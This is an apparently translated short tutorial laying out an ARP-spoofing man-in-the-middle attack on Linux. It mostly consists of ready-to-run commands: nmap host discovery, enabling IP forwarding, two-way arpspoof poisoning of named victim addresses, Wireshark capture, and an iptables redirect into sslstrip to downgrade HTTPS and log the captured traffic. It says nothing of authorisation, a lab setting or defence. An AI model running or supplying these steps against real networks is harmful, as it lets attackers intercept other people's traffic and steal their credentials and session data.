[LINUX] ARP spoofing procedure (man-in-the-middle attack, MITM)

1. Obtain the IP address of the attack target

ifconfig

arp -a

nmap -F 192.168.XXX.XXX/24

etc

2. Enable IP forwarding to forward packets through the attacker's PC

Valid at 1

echo 1 > /proc/sys/net/ipv4/ip_forward

Invalid at 0

echo 0 > /proc/sys/net/ipv4/ip_forward

3. ARP table rewrite

Specify NIC as wlan0 and rewrite the MAC address of 192.168.100.124 in the ARP table of 192.168.100.123 to the MAC address of the attacker (own).

sudo arpspoof -i wlan0 -t 192.168.100.123 192.168.100.124

Specify NIC as wlan0 and rewrite the MAC address of 192.168.100.123 in the ARP table of 192.168.100.124 to the MAC address of the attacker (own).

sudo arpspoof -i wlan0 -t 192.168.100.124 192.168.100.123

Note: It is necessary to execute it twice in another terminal so that both transmission and reception communicate via the attacker's PC!

4. Packet capture

wireshark

5. ssl strip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -l 8080

cat sslstrip.log

6. References

https://qiita.com/kinokoruumu/items/a4d98c5a55243b5afe96 https://www.slideshare.net/sonickun/arp-39782351 https://network-beginner.xyz/sslstrip https://tutorialmore.com/questions-594005.htm https://netwiz.jp/arp-spoofing/ https://www.atmarkit.co.jp/ait/articles/0305/09/news003_3.html https://milestone-of-se.nesuke.com/nw-basic/ethernet/gratuitous-arp/ https://network-beginner.xyz/dns_spoof

Recommended Posts

ARP spoofing procedure (man-in-the-middle attack, MITM)
I tried ARP spoofing
ARP spoofing with python